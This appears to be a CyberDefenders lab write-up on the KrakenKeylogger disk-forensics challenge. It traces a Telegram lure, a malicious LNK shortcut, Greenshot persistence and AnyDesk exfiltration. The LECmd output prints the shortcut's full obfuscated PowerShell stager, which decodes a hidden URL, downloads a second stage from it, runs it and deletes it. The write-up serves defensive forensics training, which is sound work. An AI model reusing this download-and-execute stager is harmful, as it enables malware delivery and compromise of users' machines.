Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
KrakenKeylloger Lab – CyberDenfenders
Disk Analysis
Scenario
An employee at a large company was assigned a task with a two-day deadline. Realizing that he could not complete the task in that timeframe, he sought help from someone else. After one day, he received a notification from that person who informed him that he had managed to finish the assignment and sent it to the employee as a test. However, the person also sent a message to the employee stating that if he wanted the completed assignment, he would have to pay $160.
The helper’s demand for payment revealed that he was a threat actor. The company’s digital forensics team was called in to investigate and identify the attacker, determine the extent of the attack, and assess potential data breaches. The team must analyze the employee’s computer and communication logs to prevent similar attacks in the future.
Provided Files
Questions
1. What is the the web messaging app the employee used to talk to the attacker?
A web messaging app if installed on a host should send notifications. So we can analyze the notification database wpndatabase.db located in
\Users\OMEN\AppData\Local\Microsoft\Windows\Notifications using SQLite:
We find the user was using telegram
2. What is the password for the protected ZIP file sent by the attacker to the employee?
Clicking on the row we found earlier, we get the complete notification that contains the password:
3. What domain did the attacker use to download the second stage of the malware?
Analyzing the LNK file using LeCmd.exe:
.\LECmd.exe -f "C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk"We get the following result:
LECmd version 1.5.1.0
Author: Eric Zimmerman ([email protected])
https://github.com/EricZimmerman/LECmd
Command line: -f C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk
Warning: Administrator privileges not found!
Processing C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk
Source file: C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk
Source created: 2025-08-19 18:29:35
Source modified: 2023-05-11 02:46:14
Source accessed: 2025-08-19 18:37:03
--- Header ---
Target created: null
Target modified: null
Target accessed: null
File size (bytes): 0
Flags: HasTargetIdList, HasRelativePath, HasArguments, HasIconLocation, IsUnicode, HasExpIcon
File attributes: 0
Icon index: 67
Show window: SwShowminnoactive (Display the window as minimized without activating it.)
Relative Path: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Arguments: -ExecutionPolicy UnRestricted $ProgressPreference = 0;
function nvRClWiAJT($OnUPXhNfGyEh){$OnUPXhNfGyEh[$OnUPXhNfGyEh.Length..0] -join('')};
function sDjLksFILdkrdR($OnUPXhNfGyEh){
$vecsWHuXBHu = nvRClWiAJT $OnUPXhNfGyEh;
for($TJuYrHOorcZu = 0;$TJuYrHOorcZu -lt $vecsWHuXBHu.Length;$TJuYrHOorcZu += 2){
try{$zRavFAQNJqOVxb += nvRClWiAJT $vecsWHuXBHu.Substring($TJuYrHOorcZu,2)}
catch{$zRavFAQNJqOVxb += $vecsWHuXBHu.Substring($TJuYrHOorcZu,1)}};$zRavFAQNJqOVxb};
$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht';
$cDkdhkGBtl = $env:APPDATA + '\' + ($NpzibtULgyi -split '/')[-1];
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing;
[IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi);
& $cDkdhkGBtl;
sleep 3;
rm $cDkdhkGBtl;
Icon Location: C:\Windows\System32\imageres.dll
--- Target ID information (Format: Type ==> Value) ---
Absolute path: This PC\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
-Root folder: GUID ==> This PC
-Drive letter ==> C:
-Directory ==> Windows
Short name: Windows
Modified:
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: Windows
Created:
Last access:
-Directory ==> System32
Short name: System32
Modified:
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: System32
Created:
Last access:
-Directory ==> WindowsPowerShell
Short name: WindowsPowerShell
Modified:
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: WindowsPowerShell
Created:
Last access:
-Directory ==> v1.0
Short name: v1.0
Modified:
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: v1.0
Created:
Last access:
-File ==> powershell.exe
Short name: powershell.exe
Modified:
Extension block count: 1
--------- Block 0 (Beef0004) ---------
Long name: powershell.exe
Created:
Last access:
--- End Target ID information ---
--- Extra blocks information ---
>> Icon environment data block
Icon path: %SystemRoot%\System32\imageres.dll
>> Special folder data block
Special Folder ID: 37
>> Known folder data block
Known folder GUID: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> System
>> Property store data block (Format: GUID\ID Description ==> Value)
46588ae2-4cbc-4338-bbfc-139326986dce\4 SID ==> S-1-5-21-66729632-1778321671-188542082-1001We find the domain here however we need to decode it:
$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht';To decode it, we should reverse the obfuscated string, then swap characters in each 2-char chunk
4. What is the name of the command that the attacker injected using one of the installed LOLAPPS on the machine to achieve persistence?
The question is asking about LOLAPPS. Google searching LOLAPPS, we find the following list:
We need to know which app was installed on the host. Looking at AppData\Roaming, we find Greenshot:
Opening the folder we find a .ini file:
Inside the file, we find the command:
jlhgfjhdflghjhuhuh5. What is the complete path of the malicious file that the attacker used to achieve persistence?
We can find the complete file in the same file:
6. What is the name of the application the attacker utilized for data exfiltration?
We can find in videos anydesk installed:
7. What is the IP address of the attacker?
Since the attacker use AnyDesk, we can analyze ad.trace file:
Inside ad.trace we find the IP:
